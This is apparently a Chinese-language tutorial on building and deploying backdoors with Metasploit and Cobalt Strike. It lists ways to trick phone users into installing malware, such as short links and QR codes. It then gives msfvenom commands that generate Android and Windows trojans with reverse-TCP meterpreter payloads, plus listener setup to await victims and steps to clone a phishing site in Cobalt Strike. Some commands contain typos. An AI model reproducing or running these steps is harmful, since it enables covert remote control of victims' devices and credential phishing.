
MSF恶意程序利用+CS上线
手机恶意应用程序分析
手机恶意程序
- 一般是指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序
主要诱骗安装手段
- 生成短网址
- 生成二维码
MSF恶意程序利用
Android后门程序攻击
-
打开Metasploit
- msfconsole
-
建立APK木马文件
- msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxl port=5555 R > /home/kali/muma.app
-
打开监听程序
- use exploit/multi/handler
-
设置攻击载荷
- set payload android/meterpreter/reverse_tcp
-
设置攻击方IP
- set lhost 192.168.xx.xx
-
设置监听端口
- set lport 5555
-
开始攻击
- run
-
等待受害者上线
-
想知道有哪些指令
- help
Windows后门程序攻击
-
msfvenom
- 是一个Metasploit独立的有效负载生成器,也是msfpayload和
msfencode的替代品。是用来生成后门的软件
- 是一个Metasploit独立的有效负载生成器,也是msfpayload和
-
建立EXE木马文件
- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xx.xxl port=6060 -f exe R >home/kali/mama.exe
-
打开监听程序
- use exploit/multi/handler
-
设置攻击载荷
- set payload windows/meterpreter/reverse_tcp
-
设置攻击方IP
- set lhost 192.168.xx.xx
-
设置监听端口
- set lport 6060
-
开始攻击
- run
-
等待受害者上线
Cobalt Strike
客户端
服务器端
解压文件
- unzip cobalt_strike_4.5
进入文件夹
- cd
将所有文件设置为最高权限
- chmod 777 *
打开服务器端
- ./teamsever.sh 192.168.xx.xx password
运行运行客户端
- ./cobaltstrike
生成克隆钓鱼网站
- 1、新建监听器
-
2、网站克隆
- 输入克隆URL
- 输入本地URL(本地或服务器域名)
Comments NOTHING